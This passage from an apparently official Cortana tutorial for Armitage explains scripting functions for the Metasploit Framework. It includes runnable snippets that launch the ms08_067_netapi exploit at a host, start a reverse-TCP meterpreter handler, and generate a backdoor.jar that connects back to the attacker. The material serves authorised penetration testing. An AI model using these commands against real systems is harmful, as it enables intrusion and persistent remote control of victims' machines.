Cortana Tutorial - Armitage
The &modules function returns an array of modules of a particular type. This function also
filters the list using a wildcard expression if you ask it to.

Use the &options function to find the options associated with a particular module. The
&info function provides extra information about a module.

To launch a module (any module), use the &launch function. The following code launches
the ms08_067_netapi module:

    launch("exploit", "windows/smb/ms08_067_netapi", %(
        RHOST => "192.168.95.166",
        PAYLOAD => "windows/meterpreter/bind_tcp"));

The &launch function doesn't provide much help though. It launches a module of a
particular type with the options you give it.

Use &exploit to quickly launch an exploit module. This function will set a payload for you
and take care of all the details. While there are several optional arguments, you may use
&exploit with just two arguments to launch a fully configured exploit at a host.

    exploit("windows/smb/ms08_067_netapi", "192.168.95.166");

Use the &handler function to quickly start a multi/handler for a payload. A multi/handler
waits for a payload to connect to it. The following example starts a multi/handler for
java/meterpreter/reverse_tcp on port 81.

    handler("java/meterpreter/reverse_tcp", 81);

Use the &generate function to generate a payload suitable for saving to a file. This example
generates a Java meterpreter file and saves it to backdoor.jar. This file connects to the
multi/handler we created in the previous example.

    $backdoor = generate("java/meterpreter/reverse_tcp", lhost(), 81,
        %(), "raw");
    $handle = openf(">backdoor.jar");
    writeb($handle, $backdoor);
    closef($handle);

The &lhost function returns the IP address of the system hosting the Metasploit
Framework.

Data Management

One of the gaps in the Metasploit API is a lack of documented methods to communicate
with the database. Metasploit stores hosts, services, credentials, and a wealth of other data
points in a database. Cortana transparently connects to the Metasploit database and
regularly polls the known sessions, routes, hosts, services, loots, and credentials.